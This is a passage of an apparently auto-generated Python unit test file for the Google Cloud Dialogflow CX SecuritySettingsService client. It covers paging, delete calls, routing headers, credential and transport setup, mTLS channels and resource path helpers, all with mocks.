            type(client.transport.list_security_settings),
            '__call__') as call:
        # Set the response to a series of pages.
        call.side_effect = (
            security_settings.ListSecuritySettingsResponse(
                security_settings=[
                    security_settings.SecuritySettings(),
                    security_settings.SecuritySettings(),
                    security_settings.SecuritySettings(),
                ],
                next_page_token='abc',
            ),
            security_settings.ListSecuritySettingsResponse(
                security_settings=[],
                next_page_token='def',
            ),
            security_settings.ListSecuritySettingsResponse(
                security_settings=[
                    security_settings.SecuritySettings(),
                ],
                next_page_token='ghi',
            ),
            security_settings.ListSecuritySettingsResponse(
                security_settings=[
                    security_settings.SecuritySettings(),
                    security_settings.SecuritySettings(),
                ],
            ),
            RuntimeError,
        )
        metadata = ()
        metadata = tuple(metadata) + (
            gapic_v1.routing_header.to_grpc_metadata((
                ('parent', ''),
            )),
        )
        pager = client.list_security_settings(request={})
        assert pager._metadata == metadata
        results = [i for i in pager]
        assert len(results) == 6
        assert all(isinstance(i, security_settings.SecuritySettings)
                   for i in results)
def test_list_security_settings_pages():
    """The sync pager exposes raw pages whose tokens match the mocked sequence."""
    client = SecuritySettingsServiceClient(
        # Instantiate the credentials object, consistent with every other
        # test in this file (the class itself was previously passed).
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.list_security_settings),
            '__call__') as call:
        # Set the response to a series of pages.
        call.side_effect = (
            security_settings.ListSecuritySettingsResponse(
                security_settings=[
                    security_settings.SecuritySettings(),
                    security_settings.SecuritySettings(),
                    security_settings.SecuritySettings(),
                ],
                next_page_token='abc',
            ),
            security_settings.ListSecuritySettingsResponse(
                security_settings=[],
                next_page_token='def',
            ),
            security_settings.ListSecuritySettingsResponse(
                security_settings=[
                    security_settings.SecuritySettings(),
                ],
                next_page_token='ghi',
            ),
            security_settings.ListSecuritySettingsResponse(
                security_settings=[
                    security_settings.SecuritySettings(),
                    security_settings.SecuritySettings(),
                ],
            ),
            RuntimeError,
        )
        pages = list(client.list_security_settings(request={}).pages)
        for page_, token in zip(pages, ['abc','def','ghi', '']):
            assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_security_settings_async_pager():
    """The async pager walks all pages and yields every SecuritySettings item."""
    client = SecuritySettingsServiceAsyncClient(
        # Instantiate the credentials object, consistent with every other
        # test in this file (the class itself was previously passed).
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.list_security_settings),
            '__call__', new_callable=mock.AsyncMock) as call:
        # Set the response to a series of pages.
        call.side_effect = (
            security_settings.ListSecuritySettingsResponse(
                security_settings=[
                    security_settings.SecuritySettings(),
                    security_settings.SecuritySettings(),
                    security_settings.SecuritySettings(),
                ],
                next_page_token='abc',
            ),
            security_settings.ListSecuritySettingsResponse(
                security_settings=[],
                next_page_token='def',
            ),
            security_settings.ListSecuritySettingsResponse(
                security_settings=[
                    security_settings.SecuritySettings(),
                ],
                next_page_token='ghi',
            ),
            security_settings.ListSecuritySettingsResponse(
                security_settings=[
                    security_settings.SecuritySettings(),
                    security_settings.SecuritySettings(),
                ],
            ),
            RuntimeError,
        )
        async_pager = await client.list_security_settings(request={},)
        assert async_pager.next_page_token == 'abc'
        responses = []
        async for response in async_pager:
            responses.append(response)
        assert len(responses) == 6
        assert all(isinstance(i, security_settings.SecuritySettings)
                   for i in responses)
@pytest.mark.asyncio
async def test_list_security_settings_async_pages():
    """The async pager exposes raw pages whose tokens match the mocked sequence."""
    client = SecuritySettingsServiceAsyncClient(
        # Instantiate the credentials object, consistent with every other
        # test in this file (the class itself was previously passed).
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.list_security_settings),
            '__call__', new_callable=mock.AsyncMock) as call:
        # Set the response to a series of pages.
        call.side_effect = (
            security_settings.ListSecuritySettingsResponse(
                security_settings=[
                    security_settings.SecuritySettings(),
                    security_settings.SecuritySettings(),
                    security_settings.SecuritySettings(),
                ],
                next_page_token='abc',
            ),
            security_settings.ListSecuritySettingsResponse(
                security_settings=[],
                next_page_token='def',
            ),
            security_settings.ListSecuritySettingsResponse(
                security_settings=[
                    security_settings.SecuritySettings(),
                ],
                next_page_token='ghi',
            ),
            security_settings.ListSecuritySettingsResponse(
                security_settings=[
                    security_settings.SecuritySettings(),
                    security_settings.SecuritySettings(),
                ],
            ),
            RuntimeError,
        )
        pages = []
        async for page_ in (await client.list_security_settings(request={})).pages:
            pages.append(page_)
        for page_, token in zip(pages, ['abc','def','ghi', '']):
            assert page_.raw_page.next_page_token == token
def test_delete_security_settings(transport: str = 'grpc', request_type=security_settings.DeleteSecuritySettingsRequest):
    """DeleteSecuritySettings forwards the request and returns None."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport=transport,
    )
    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.delete_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        call.return_value = None
        response = client.delete_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == security_settings.DeleteSecuritySettingsRequest()
    # Establish that the response is the type that we expect.
    assert response is None
def test_delete_security_settings_from_dict():
    """Re-run the delete test with a dict-typed request body."""
    test_delete_security_settings(request_type=dict)
def test_delete_security_settings_empty_call():
    """A call with neither a request nor flattened fields sends the default request."""
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport='grpc',
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.delete_security_settings),
            '__call__') as call:
        client.delete_security_settings()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == security_settings.DeleteSecuritySettingsRequest()
@pytest.mark.asyncio
async def test_delete_security_settings_async(transport: str = 'grpc_asyncio', request_type=security_settings.DeleteSecuritySettingsRequest):
    """Async variant: DeleteSecuritySettings forwards the request and returns None."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport=transport,
    )
    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.delete_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        response = await client.delete_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == security_settings.DeleteSecuritySettingsRequest()
    # Establish that the response is the type that we expect.
    assert response is None
@pytest.mark.asyncio
async def test_delete_security_settings_async_from_dict():
    """Re-run the async delete test with a dict-typed request body."""
    await test_delete_security_settings_async(request_type=dict)
def test_delete_security_settings_field_headers():
    """The routing header reflecting the request name is sent as metadata."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = security_settings.DeleteSecuritySettingsRequest()
    request.name = 'name/value'
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.delete_security_settings),
            '__call__') as call:
        call.return_value = None
        client.delete_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request
    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert (
        'x-goog-request-params',
        'name=name/value',
    ) in kw['metadata']
@pytest.mark.asyncio
async def test_delete_security_settings_field_headers_async():
    """Async variant: routing header for the request name is sent as metadata."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = security_settings.DeleteSecuritySettingsRequest()
    request.name = 'name/value'
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.delete_security_settings),
            '__call__') as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        await client.delete_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request
    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert (
        'x-goog-request-params',
        'name=name/value',
    ) in kw['metadata']
def test_delete_security_settings_flattened():
    """The flattened name keyword arg is packed into the request object."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.delete_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        call.return_value = None
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.delete_security_settings(
            name='name_value',
        )
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].name == 'name_value'
def test_delete_security_settings_flattened_error():
    """Passing both a request object and flattened fields raises ValueError."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.delete_security_settings(
            security_settings.DeleteSecuritySettingsRequest(),
            name='name_value',
        )
@pytest.mark.asyncio
async def test_delete_security_settings_flattened_async():
    """Async variant: the flattened name keyword arg is packed into the request."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.delete_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        # (The sync-style `call.return_value = None` that used to precede this
        # line was dead: it was immediately overwritten by the awaitable below.)
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.delete_security_settings(
            name='name_value',
        )
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].name == 'name_value'
@pytest.mark.asyncio
async def test_delete_security_settings_flattened_error_async():
    """Async variant: request object plus flattened fields raises ValueError."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        await client.delete_security_settings(
            security_settings.DeleteSecuritySettingsRequest(),
            name='name_value',
        )
def test_credentials_transport_error():
    """Combining a transport instance with credentials, a credentials file, or scopes raises."""
    # It is an error to provide credentials and a transport instance.
    transport = transports.SecuritySettingsServiceGrpcTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    with pytest.raises(ValueError):
        client = SecuritySettingsServiceClient(
            credentials=ga_credentials.AnonymousCredentials(),
            transport=transport,
        )
    # It is an error to provide a credentials file and a transport instance.
    transport = transports.SecuritySettingsServiceGrpcTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    with pytest.raises(ValueError):
        client = SecuritySettingsServiceClient(
            client_options={"credentials_file": "credentials.json"},
            transport=transport,
        )
    # It is an error to provide scopes and a transport instance.
    transport = transports.SecuritySettingsServiceGrpcTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    with pytest.raises(ValueError):
        client = SecuritySettingsServiceClient(
            client_options={"scopes": ["1", "2"]},
            transport=transport,
        )
def test_transport_instance():
    """A client accepts and exposes a custom transport instance."""
    # A client may be instantiated with a custom transport instance.
    transport = transports.SecuritySettingsServiceGrpcTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    client = SecuritySettingsServiceClient(transport=transport)
    assert client.transport is transport
def test_transport_get_channel():
    """Both sync and async gRPC transports expose a usable channel."""
    # A client may be instantiated with a custom transport instance.
    transport = transports.SecuritySettingsServiceGrpcTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    channel = transport.grpc_channel
    assert channel
    transport = transports.SecuritySettingsServiceGrpcAsyncIOTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    channel = transport.grpc_channel
    assert channel
@pytest.mark.parametrize("transport_class", [
    transports.SecuritySettingsServiceGrpcTransport,
    transports.SecuritySettingsServiceGrpcAsyncIOTransport,
])
def test_transport_adc(transport_class):
    """Transports fall back to application default credentials when none are given."""
    # Test default credentials are used if not provided.
    with mock.patch.object(google.auth, 'default') as adc:
        adc.return_value = (ga_credentials.AnonymousCredentials(), None)
        transport_class()
        adc.assert_called_once()
def test_transport_grpc_default():
    """The gRPC transport is the default when none is specified."""
    # A client should use the gRPC transport by default.
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    assert isinstance(
        client.transport,
        transports.SecuritySettingsServiceGrpcTransport,
    )
def test_security_settings_service_base_transport_error():
    """Supplying both credentials and a credentials file raises DuplicateCredentialArgs."""
    # Passing both a credentials object and credentials_file should raise an error
    with pytest.raises(core_exceptions.DuplicateCredentialArgs):
        transport = transports.SecuritySettingsServiceTransport(
            credentials=ga_credentials.AnonymousCredentials(),
            credentials_file="credentials.json"
        )
def test_security_settings_service_base_transport():
    """Every RPC method on the abstract base transport raises NotImplementedError."""
    # Instantiate the base transport.
    with mock.patch('google.cloud.dialogflowcx_v3beta1.services.security_settings_service.transports.SecuritySettingsServiceTransport.__init__') as Transport:
        Transport.return_value = None
        transport = transports.SecuritySettingsServiceTransport(
            credentials=ga_credentials.AnonymousCredentials(),
        )
    # Every method on the transport should just blindly
    # raise NotImplementedError.
    methods = (
        'create_security_settings',
        'get_security_settings',
        'update_security_settings',
        'list_security_settings',
        'delete_security_settings',
    )
    for method in methods:
        with pytest.raises(NotImplementedError):
            getattr(transport, method)(request=object())
    with pytest.raises(NotImplementedError):
        transport.close()
@requires_google_auth_gte_1_25_0
def test_security_settings_service_base_transport_with_credentials_file():
    """A credentials file is loaded with default scopes on google-auth >= 1.25."""
    # Instantiate the base transport with a credentials file
    with mock.patch.object(google.auth, 'load_credentials_from_file', autospec=True) as load_creds, mock.patch('google.cloud.dialogflowcx_v3beta1.services.security_settings_service.transports.SecuritySettingsServiceTransport._prep_wrapped_messages') as Transport:
        Transport.return_value = None
        load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
        transport = transports.SecuritySettingsServiceTransport(
            credentials_file="credentials.json",
            quota_project_id="octopus",
        )
        load_creds.assert_called_once_with("credentials.json",
            scopes=None,
            default_scopes=(
            'https://www.googleapis.com/auth/cloud-platform',
            'https://www.googleapis.com/auth/dialogflow',
),
            quota_project_id="octopus",
        )
@requires_google_auth_lt_1_25_0
def test_security_settings_service_base_transport_with_credentials_file_old_google_auth():
    """Older google-auth (< 1.25) lacks ``default_scopes``; scopes are passed directly."""
    # Instantiate the base transport with a credentials file
    with mock.patch.object(google.auth, 'load_credentials_from_file', autospec=True) as load_creds, mock.patch('google.cloud.dialogflowcx_v3beta1.services.security_settings_service.transports.SecuritySettingsServiceTransport._prep_wrapped_messages') as Transport:
        Transport.return_value = None
        load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
        transport = transports.SecuritySettingsServiceTransport(
            credentials_file="credentials.json",
            quota_project_id="octopus",
        )
        load_creds.assert_called_once_with("credentials.json", scopes=(
            'https://www.googleapis.com/auth/cloud-platform',
            'https://www.googleapis.com/auth/dialogflow',
),
            quota_project_id="octopus",
        )
def test_security_settings_service_base_transport_with_adc():
    """The base transport must consult ADC when neither credentials nor a file is given."""
    # Test the default credentials are used if credentials and credentials_file are None.
    with mock.patch.object(google.auth, 'default', autospec=True) as adc, mock.patch('google.cloud.dialogflowcx_v3beta1.services.security_settings_service.transports.SecuritySettingsServiceTransport._prep_wrapped_messages') as Transport:
        Transport.return_value = None
        adc.return_value = (ga_credentials.AnonymousCredentials(), None)
        transport = transports.SecuritySettingsServiceTransport()
        adc.assert_called_once()
@requires_google_auth_gte_1_25_0
def test_security_settings_service_auth_adc():
    """The client should request ADC with the service default scopes (google-auth >= 1.25)."""
    # If no credentials are provided, we should use ADC credentials.
    with mock.patch.object(google.auth, 'default', autospec=True) as adc:
        adc.return_value = (ga_credentials.AnonymousCredentials(), None)
        SecuritySettingsServiceClient()
        adc.assert_called_once_with(
            scopes=None,
            default_scopes=(
            'https://www.googleapis.com/auth/cloud-platform',
            'https://www.googleapis.com/auth/dialogflow',
),
            quota_project_id=None,
        )
@requires_google_auth_lt_1_25_0
def test_security_settings_service_auth_adc_old_google_auth():
    """Older google-auth (< 1.25) receives the default scopes via ``scopes=``."""
    # If no credentials are provided, we should use ADC credentials.
    with mock.patch.object(google.auth, 'default', autospec=True) as adc:
        adc.return_value = (ga_credentials.AnonymousCredentials(), None)
        SecuritySettingsServiceClient()
        adc.assert_called_once_with(
            scopes=( 'https://www.googleapis.com/auth/cloud-platform', 'https://www.googleapis.com/auth/dialogflow',),
            quota_project_id=None,
        )
@pytest.mark.parametrize(
    "transport_class",
    [
        transports.SecuritySettingsServiceGrpcTransport,
        transports.SecuritySettingsServiceGrpcAsyncIOTransport,
    ],
)
@requires_google_auth_gte_1_25_0
def test_security_settings_service_transport_auth_adc(transport_class):
    """User scopes pass through while default scopes stay intact (google-auth >= 1.25)."""
    # If credentials and host are not provided, the transport class should use
    # ADC credentials.
    with mock.patch.object(google.auth, 'default', autospec=True) as adc:
        adc.return_value = (ga_credentials.AnonymousCredentials(), None)
        transport_class(quota_project_id="octopus", scopes=["1", "2"])
        adc.assert_called_once_with(
            scopes=["1", "2"],
            default_scopes=( 'https://www.googleapis.com/auth/cloud-platform',  'https://www.googleapis.com/auth/dialogflow',),
            quota_project_id="octopus",
        )
@pytest.mark.parametrize(
    "transport_class",
    [
        transports.SecuritySettingsServiceGrpcTransport,
        transports.SecuritySettingsServiceGrpcAsyncIOTransport,
    ],
)
@requires_google_auth_lt_1_25_0
def test_security_settings_service_transport_auth_adc_old_google_auth(transport_class):
    """Under google-auth < 1.25 the default scopes are forwarded as ``scopes=``."""
    # If credentials and host are not provided, the transport class should use
    # ADC credentials.
    with mock.patch.object(google.auth, "default", autospec=True) as adc:
        adc.return_value = (ga_credentials.AnonymousCredentials(), None)
        transport_class(quota_project_id="octopus")
        adc.assert_called_once_with(scopes=(
            'https://www.googleapis.com/auth/cloud-platform',
            'https://www.googleapis.com/auth/dialogflow',
),
            quota_project_id="octopus",
        )
@pytest.mark.parametrize(
    "transport_class,grpc_helpers",
    [
        (transports.SecuritySettingsServiceGrpcTransport, grpc_helpers),
        (transports.SecuritySettingsServiceGrpcAsyncIOTransport, grpc_helpers_async)
    ],
)
def test_security_settings_service_transport_create_channel(transport_class, grpc_helpers):
    """create_channel must receive the service host, scopes, and message-size options."""
    # If credentials and host are not provided, the transport class should use
    # ADC credentials.
    with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch.object(
        grpc_helpers, "create_channel", autospec=True
    ) as create_channel:
        creds = ga_credentials.AnonymousCredentials()
        adc.return_value = (creds, None)
        transport_class(
            quota_project_id="octopus",
            scopes=["1", "2"]
        )
        create_channel.assert_called_with(
            "dialogflow.googleapis.com:443",
            credentials=creds,
            credentials_file=None,
            quota_project_id="octopus",
            default_scopes=(
            'https://www.googleapis.com/auth/cloud-platform',
            'https://www.googleapis.com/auth/dialogflow',
),
            scopes=["1", "2"],
            default_host="dialogflow.googleapis.com",
            ssl_credentials=None,
            options=[
                ("grpc.max_send_message_length", -1),
                ("grpc.max_receive_message_length", -1),
            ],
        )
@pytest.mark.parametrize("transport_class", [transports.SecuritySettingsServiceGrpcTransport, transports.SecuritySettingsServiceGrpcAsyncIOTransport])
def test_security_settings_service_grpc_transport_client_cert_source_for_mtls(
    transport_class
):
    """ssl_channel_credentials wins; client_cert_source_for_mtls is the fallback."""
    cred = ga_credentials.AnonymousCredentials()
    # Check ssl_channel_credentials is used if provided.
    with mock.patch.object(transport_class, "create_channel") as mock_create_channel:
        mock_ssl_channel_creds = mock.Mock()
        transport_class(
            host="squid.clam.whelk",
            credentials=cred,
            ssl_channel_credentials=mock_ssl_channel_creds
        )
        mock_create_channel.assert_called_once_with(
            "squid.clam.whelk:443",
            credentials=cred,
            credentials_file=None,
            scopes=None,
            ssl_credentials=mock_ssl_channel_creds,
            quota_project_id=None,
            options=[
                ("grpc.max_send_message_length", -1),
                ("grpc.max_receive_message_length", -1),
            ],
        )
    # Check if ssl_channel_credentials is not provided, then client_cert_source_for_mtls
    # is used.
    with mock.patch.object(transport_class, "create_channel", return_value=mock.Mock()):
        with mock.patch("grpc.ssl_channel_credentials") as mock_ssl_cred:
            transport_class(
                credentials=cred,
                client_cert_source_for_mtls=client_cert_source_callback
            )
            expected_cert, expected_key = client_cert_source_callback()
            mock_ssl_cred.assert_called_once_with(
                certificate_chain=expected_cert,
                private_key=expected_key
            )
def test_security_settings_service_host_no_port():
    """An endpoint with no port should be normalized to port 443."""
    endpoint_options = client_options.ClientOptions(api_endpoint='dialogflow.googleapis.com')
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
        client_options=endpoint_options,
    )
    assert client.transport._host == 'dialogflow.googleapis.com:443'
def test_security_settings_service_host_with_port():
    """An explicit port in the endpoint must be preserved as-is."""
    endpoint_options = client_options.ClientOptions(api_endpoint='dialogflow.googleapis.com:8000')
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
        client_options=endpoint_options,
    )
    assert client.transport._host == 'dialogflow.googleapis.com:8000'
def test_security_settings_service_grpc_transport_channel():
    """A caller-supplied gRPC channel must be adopted verbatim by the transport."""
    channel = grpc.secure_channel('http://localhost/', grpc.local_channel_credentials())
    # Check that channel is used if provided.
    transport = transports.SecuritySettingsServiceGrpcTransport(
        host="squid.clam.whelk",
        channel=channel,
    )
    assert transport.grpc_channel == channel
    assert transport._host == "squid.clam.whelk:443"
    # Fix: compare with None by identity (PEP 8); `== None` can mis-fire on
    # objects that override __eq__ (e.g. mocks).
    assert transport._ssl_channel_credentials is None
def test_security_settings_service_grpc_asyncio_transport_channel():
    """A caller-supplied asyncio gRPC channel must be adopted verbatim by the transport."""
    channel = aio.secure_channel('http://localhost/', grpc.local_channel_credentials())
    # Check that channel is used if provided.
    transport = transports.SecuritySettingsServiceGrpcAsyncIOTransport(
        host="squid.clam.whelk",
        channel=channel,
    )
    assert transport.grpc_channel == channel
    assert transport._host == "squid.clam.whelk:443"
    # Fix: compare with None by identity (PEP 8); `== None` can mis-fire on
    # objects that override __eq__ (e.g. mocks).
    assert transport._ssl_channel_credentials is None
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize("transport_class", [transports.SecuritySettingsServiceGrpcTransport, transports.SecuritySettingsServiceGrpcAsyncIOTransport])
def test_security_settings_service_transport_channel_mtls_with_client_cert_source(
    transport_class
):
    """Deprecated mTLS args must still build an SSL channel (and warn)."""
    with mock.patch("grpc.ssl_channel_credentials", autospec=True) as grpc_ssl_channel_cred:
        with mock.patch.object(transport_class, "create_channel") as grpc_create_channel:
            mock_ssl_cred = mock.Mock()
            grpc_ssl_channel_cred.return_value = mock_ssl_cred
            mock_grpc_channel = mock.Mock()
            grpc_create_channel.return_value = mock_grpc_channel
            cred = ga_credentials.AnonymousCredentials()
            with pytest.warns(DeprecationWarning):
                with mock.patch.object(google.auth, 'default') as adc:
                    adc.return_value = (cred, None)
                    transport = transport_class(
                        host="squid.clam.whelk",
                        api_mtls_endpoint="mtls.squid.clam.whelk",
                        client_cert_source=client_cert_source_callback,
                    )
                    adc.assert_called_once()
            grpc_ssl_channel_cred.assert_called_once_with(
                certificate_chain=b"cert bytes", private_key=b"key bytes"
            )
            grpc_create_channel.assert_called_once_with(
                "mtls.squid.clam.whelk:443",
                credentials=cred,
                credentials_file=None,
                scopes=None,
                ssl_credentials=mock_ssl_cred,
                quota_project_id=None,
                options=[
                    ("grpc.max_send_message_length", -1),
                    ("grpc.max_receive_message_length", -1),
                ],
            )
            assert transport.grpc_channel == mock_grpc_channel
            assert transport._ssl_channel_credentials == mock_ssl_cred
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize("transport_class", [transports.SecuritySettingsServiceGrpcTransport, transports.SecuritySettingsServiceGrpcAsyncIOTransport])
def test_security_settings_service_transport_channel_mtls_with_adc(
    transport_class
):
    """With api_mtls_endpoint but no cert source, ADC SSL credentials are used (and warn)."""
    mock_ssl_cred = mock.Mock()
    with mock.patch.multiple(
        "google.auth.transport.grpc.SslCredentials",
        __init__=mock.Mock(return_value=None),
        ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
    ):
        with mock.patch.object(transport_class, "create_channel") as grpc_create_channel:
            mock_grpc_channel = mock.Mock()
            grpc_create_channel.return_value = mock_grpc_channel
            mock_cred = mock.Mock()
            with pytest.warns(DeprecationWarning):
                transport = transport_class(
                    host="squid.clam.whelk",
                    credentials=mock_cred,
                    api_mtls_endpoint="mtls.squid.clam.whelk",
                    client_cert_source=None,
                )
            grpc_create_channel.assert_called_once_with(
                "mtls.squid.clam.whelk:443",
                credentials=mock_cred,
                credentials_file=None,
                scopes=None,
                ssl_credentials=mock_ssl_cred,
                quota_project_id=None,
                options=[
                    ("grpc.max_send_message_length", -1),
                    ("grpc.max_receive_message_length", -1),
                ],
            )
            assert transport.grpc_channel == mock_grpc_channel
def test_deidentify_template_path():
    """deidentify_template_path should assemble the full DLP template resource name."""
    org, loc, template = "squid", "clam", "whelk"
    expected = f"organizations/{org}/locations/{loc}/deidentifyTemplates/{template}"
    assert SecuritySettingsServiceClient.deidentify_template_path(org, loc, template) == expected
def test_parse_deidentify_template_path():
    """Parsing must exactly invert deidentify_template_path (round-trip)."""
    components = {
        "organization": "octopus",
        "location": "oyster",
        "deidentify_template": "nudibranch",
    }
    # Build a path from the components, then parse it back.
    path = SecuritySettingsServiceClient.deidentify_template_path(**components)
    assert SecuritySettingsServiceClient.parse_deidentify_template_path(path) == components
def test_inspect_template_path():
    """inspect_template_path should assemble the full inspect-template resource name."""
    org, loc, template = "cuttlefish", "mussel", "winkle"
    expected = f"organizations/{org}/locations/{loc}/inspectTemplates/{template}"
    assert SecuritySettingsServiceClient.inspect_template_path(org, loc, template) == expected
def test_parse_inspect_template_path():
    """Parsing must exactly invert inspect_template_path (round-trip)."""
    components = {
        "organization": "nautilus",
        "location": "scallop",
        "inspect_template": "abalone",
    }
    # Build a path from the components, then parse it back.
    path = SecuritySettingsServiceClient.inspect_template_path(**components)
    assert SecuritySettingsServiceClient.parse_inspect_template_path(path) == components
def test_security_settings_path():
    """security_settings_path should assemble the full SecuritySettings resource name."""
    project, loc, settings = "squid", "clam", "whelk"
    expected = f"projects/{project}/locations/{loc}/securitySettings/{settings}"
    assert SecuritySettingsServiceClient.security_settings_path(project, loc, settings) == expected
def test_parse_security_settings_path():
    """Parsing must exactly invert security_settings_path (round-trip)."""
    components = {
        "project": "octopus",
        "location": "oyster",
        "security_settings": "nudibranch",
    }
    # Build a path from the components, then parse it back.
    path = SecuritySettingsServiceClient.security_settings_path(**components)
    assert SecuritySettingsServiceClient.parse_security_settings_path(path) == components
def test_common_billing_account_path():
    """common_billing_account_path should build billingAccounts/{billing_account}."""
    account = "cuttlefish"
    assert SecuritySettingsServiceClient.common_billing_account_path(account) == f"billingAccounts/{account}"
def test_parse_common_billing_account_path():
    """Parsing must exactly invert common_billing_account_path (round-trip)."""
    components = {
        "billing_account": "mussel",
    }
    path = SecuritySettingsServiceClient.common_billing_account_path(**components)
    assert SecuritySettingsServiceClient.parse_common_billing_account_path(path) == components
def test_common_folder_path():
    """common_folder_path should build folders/{folder}."""
    folder_id = "winkle"
    assert SecuritySettingsServiceClient.common_folder_path(folder_id) == f"folders/{folder_id}"
def test_parse_common_folder_path():
    """Parsing must exactly invert common_folder_path (round-trip)."""
    components = {
        "folder": "nautilus",
    }
    path = SecuritySettingsServiceClient.common_folder_path(**components)
    assert SecuritySettingsServiceClient.parse_common_folder_path(path) == components
def test_common_organization_path():
    """common_organization_path should build organizations/{organization}."""
    org_id = "scallop"
    assert SecuritySettingsServiceClient.common_organization_path(org_id) == f"organizations/{org_id}"
def test_parse_common_organization_path():
    """Parsing must exactly invert common_organization_path (round-trip)."""
    components = {
        "organization": "abalone",
    }
    path = SecuritySettingsServiceClient.common_organization_path(**components)
    assert SecuritySettingsServiceClient.parse_common_organization_path(path) == components
def test_common_project_path():
    """common_project_path should build projects/{project}."""
    project_id = "squid"
    assert SecuritySettingsServiceClient.common_project_path(project_id) == f"projects/{project_id}"
def test_parse_common_project_path():
    """Parsing must exactly invert common_project_path (round-trip)."""
    components = {
        "project": "clam",
    }
    path = SecuritySettingsServiceClient.common_project_path(**components)
    assert SecuritySettingsServiceClient.parse_common_project_path(path) == components
def test_common_location_path():
    """common_location_path should build projects/{project}/locations/{location}."""
    project_id, loc = "whelk", "octopus"
    assert SecuritySettingsServiceClient.common_location_path(project_id, loc) == f"projects/{project_id}/locations/{loc}"
def test_parse_common_location_path():
    """Parsing must exactly invert common_location_path (round-trip)."""
    components = {
        "project": "oyster",
        "location": "nudibranch",
    }
    path = SecuritySettingsServiceClient.common_location_path(**components)
